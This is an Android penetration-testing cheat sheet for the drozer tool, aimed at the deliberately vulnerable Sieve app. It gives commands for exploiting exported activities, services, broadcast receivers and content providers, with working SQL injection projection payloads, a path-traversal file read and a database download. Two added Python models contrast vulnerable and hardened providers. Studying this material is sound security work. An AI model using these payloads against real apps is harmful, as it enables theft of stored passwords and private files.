Start a session
adb forward tcp:31415 tcp:31415
drozer console connect
Retrieve package information
run app.package.list -f <app name>
run app.package.info -a <package name>
run app.package.attacksurface    Get attack surface of package
run app.package.backup           Lists packages that use the backup API (returns true on FLAG_ALLOW_BACKUP)
run app.package.debuggable       Find debuggable packages
run app.package.info             Get information about installed packages
run app.package.launchintent     Get launch intent of package
run app.package.list             List Packages
run app.package.manifest         Get AndroidManifest.xml of package
run app.package.native           Find Native libraries embedded in the application.
run app.package.shareduid        Look for packages with shared UIDs
Identify the attack surface
run app.package.attacksurface <package name>
Exploiting activities
run app.activity.info -a <package name> -u
run app.activity.start --component <package name> <component name>
Exploiting content providers
run app.provider.info -a <package name>
run scanner.provider.finduris -a <package name>
run app.provider.query <uri>
run app.provider.update <uri> --selection <conditions> --selection-args <selection arg> --string <column> <data>    (use --integer/--boolean/--long/... instead of --string to match the column type)
run scanner.provider.sqltables -a <package name>
run scanner.provider.injection -a <package name>
run scanner.provider.traversal -a <package name>
run app.provider.finduri         Find referenced content URIs in a package
run app.provider.info            Get information about exported content providers
run app.provider.insert          Insert into a Content Provider
run app.provider.query           Query a content provider
run app.provider.read            Read from a content provider that supports files
run app.provider.update          Update a record in a content provider
Exploiting broadcast receivers
run app.broadcast.info -a <package name>
run app.broadcast.send --component <package name> <component name> --extra <type> <key> <value>
run app.broadcast.sniff --action <action>
Exploiting services
run app.service.info -a <package name>
run app.service.start --action <action> --component <package name> <component name>
run app.service.send <package name> <component name> --msg <what> <arg1> <arg2> --extra <type> <key> <value> --bundle-as-obj
Get all accessible URIs
Command: run scanner.provider.finduris -a <package name>
Example: run scanner.provider.finduris -a com.example.studayappp.sieve
SQL injection
Command: run app.provider.query <uri> [--projection] [--selection]
Example: run app.provider.query content://com.example.studayappp.sieve.DBContentProvider/Passwords/
List all tables: run app.provider.query content://com.example.studayappp.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
Dump a single table (e.g. Key): run app.provider.query content://com.example.studayappp.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
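Why the two --projection payloads above work, as an added example (not the page's or drozer's code): a provider that pastes the caller-supplied projection and selection into SELECT ... FROM ... WHERE ... the way SQLiteQueryBuilder does without a projection map or strict mode. The schema, the table contents and the allow-list are constructed for the demo and only loosely resemble Sieve's database; the trailing `--` is what discards the provider's own FROM/WHERE clause.

```python
"""Model of a projection-injectable content provider (added example, constructed data)."""
import sqlite3

# Constructed schema, loosely modelled on Sieve's database (assumption).
SAMPLE_SCHEMA = """
CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, username TEXT,
                        password BLOB, email TEXT);
CREATE TABLE Key (Password TEXT, pin TEXT);
INSERT INTO Passwords VALUES (1, 'Gmail', 'alice', X'DEADBEEF', 'alice@example.com');
INSERT INTO Key VALUES ('master-secret', '1234');
"""

# Columns a hardened provider is willing to expose per table (the projection map).
ALLOWED_COLUMNS = {
    "Passwords": {"_id", "service", "username", "password", "email"},
}


def open_sample_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    return conn


def build_query(table, projection, selection=None):
    """Paste projection and selection into the statement unvalidated, as
    SQLiteQueryBuilder.buildQuery() does when no projection map is set."""
    cols = ", ".join(projection) if projection else "*"
    sql = f"SELECT {cols} FROM {table}"
    if selection:
        sql += f" WHERE {selection}"
    return sql


def vulnerable_query(conn, table, projection, selection=None):
    """The provider's query(): executes whatever build_query() produced."""
    return conn.execute(build_query(table, projection, selection)).fetchall()


def hardened_query(conn, table, projection, selection=None, selection_args=()):
    """Allow-list projection columns and bind selection arguments via '?'.
    The selection string itself is still caller-controlled, so a real provider
    should additionally use SQLiteQueryBuilder.setStrict(true)."""
    if table not in ALLOWED_COLUMNS:
        raise ValueError(f"unknown table {table!r}")
    for col in projection or ():
        if col not in ALLOWED_COLUMNS[table]:
            raise ValueError(f"projection column not allowed: {col!r}")
    sql = build_query(table, projection, selection)
    return conn.execute(sql, tuple(selection_args)).fetchall()


def list_tables_via_projection(conn):
    """Same effect as: --projection "* FROM SQLITE_MASTER WHERE type='table';--" """
    return vulnerable_query(conn, "Passwords",
                            ["* FROM SQLITE_MASTER WHERE type='table';--"],
                            "service='Gmail'")


def dump_key_via_projection(conn):
    """Same effect as: --projection "* FROM Key;--" """
    return vulnerable_query(conn, "Passwords", ["* FROM Key;--"], "service='Gmail'")


if __name__ == "__main__":
    db = open_sample_db()
    print(build_query("Passwords", ["* FROM Key;--"], "service='Gmail'"))
    print([row[1] for row in list_tables_via_projection(db)])
    print(dump_key_via_projection(db))
    try:
        hardened_query(db, "Passwords", ["* FROM Key;--"])
    except ValueError as exc:
        print("hardened provider rejected:", exc)
```

Printing build_query() first shows the actual statement the provider runs: `SELECT * FROM Key;-- FROM Passwords WHERE service='Gmail'`, i.e. the original FROM and WHERE survive only as a comment.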
Detecting SQL injection
Command: run scanner.provider.injection -a <package name>
Example: run scanner.provider.injection -a com.example.studayappp.sieve
Detecting directory traversal
Command: run scanner.provider.traversal -a <package name>
Example: run scanner.provider.traversal -a com.example.studayappp.sieve
Read a file from the filesystem
Example: run app.provider.read content://com.example.studayappp.sieve.FileBackupProvider/etc/hosts
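The openFile() pattern that scanner.provider.traversal and the app.provider.read example above are probing, as an added example (not the page's, Sieve's or drozer's code): a throwaway directory tree stands in for the device filesystem, and a provider that opens the URI path verbatim is shown next to one that confines it to the app's own files directory. The package name com.example.app, the paths and the file contents are constructed for the demo.

```python
"""File-backed content provider: verbatim path vs confined path (added example)."""
import os
import tempfile

# Constructed app data directory, relative to the fake device root.
APP_FILES = os.path.join("data", "data", "com.example.app", "files")


def make_fake_device(root=None):
    """Create <root>/etc/hosts and <root>/data/data/com.example.app/files/backup.txt."""
    root = root or tempfile.mkdtemp(prefix="provider-demo-")
    os.makedirs(os.path.join(root, "etc"), exist_ok=True)
    os.makedirs(os.path.join(root, APP_FILES), exist_ok=True)
    with open(os.path.join(root, "etc", "hosts"), "w") as fh:
        fh.write("127.0.0.1 localhost\n")
    with open(os.path.join(root, APP_FILES, "backup.txt"), "w") as fh:
        fh.write("exported backup\n")
    return root


def vulnerable_open_file(root, uri_path):
    """Provider that does ParcelFileDescriptor.open(new File(uri.getPath()), ...):
    the URI path is used as an absolute device path, so content://.../etc/hosts
    and any ../ sequence are served as-is."""
    path = os.path.join(root, uri_path.lstrip("/"))
    with open(path) as fh:
        return fh.read()


def hardened_open_file(root, uri_path):
    """Resolve the URI path under the app files directory and refuse anything that
    canonicalises outside it; realpath() collapses '..' and follows symlinks, so
    the comparison is done on the final location, not the requested string."""
    base = os.path.realpath(os.path.join(root, APP_FILES))
    target = os.path.realpath(os.path.join(base, uri_path.lstrip("/")))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refusing path outside provider root: {uri_path}")
    with open(target) as fh:
        return fh.read()


if __name__ == "__main__":
    device = make_fake_device()
    print(vulnerable_open_file(device, "/etc/hosts"), end="")
    print(hardened_open_file(device, "backup.txt"), end="")
    try:
        hardened_open_file(device, "../../../../etc/hosts")
    except PermissionError as exc:
        print(exc)
```

The check compares canonical paths rather than looking for "../" in the input, which is what lets it also catch encoded or symlink-based variants that a string filter would miss.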
Download a database file to the local machine
Example: run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db d:/database.db